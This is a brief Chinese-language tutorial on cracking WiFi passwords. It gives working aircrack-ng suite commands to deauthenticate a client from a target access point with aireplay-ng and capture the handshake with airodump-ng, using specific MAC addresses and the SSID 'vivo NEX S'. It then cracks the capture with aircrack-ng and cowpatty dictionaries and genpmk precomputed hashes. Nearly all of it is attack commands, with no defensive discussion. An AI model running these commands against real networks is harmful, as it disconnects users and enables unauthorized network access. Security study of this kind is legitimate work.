无线WIFI安全(二)

无线密码破解

DEAUTHENTICATION

airodump-ng wlan0mon  –bssid  目标BSSID

使用aireplay-ng -0 0 -a <AP MAC> -c <客户端MAC> 网卡名称

使目标强制下线,同时监听目标BSSID数据包

aireplay-ng  -0 0 -a E6:93:A5:E3:72:21 -c 88:B1:11:BE:81:83 wlan0mon

airodump-ng wlan0mon -c 10 –bssid E6:93:A5:E3:72:21 -w nex.cap

同时,当前目录下生成抓取的握手数据包

AIROLIB破解无线密码

aircrack-ng –w 字典 抓包流量.cap

cowpatty -r nex.cap-01.cap -f password.lst -s ‘vivo NEX S’  (如果SSID包含空格,那么使用单引号,如果不包含空格,则不需要单引号)

使用彩虹表进行破解

使用genpmk -f password.lst -d nexhash.lst -s ‘vivo NEX S’生成彩虹表

cowpatty -r nex.cap-01.cap -d nexhash.lst -s ‘vivo NEX S’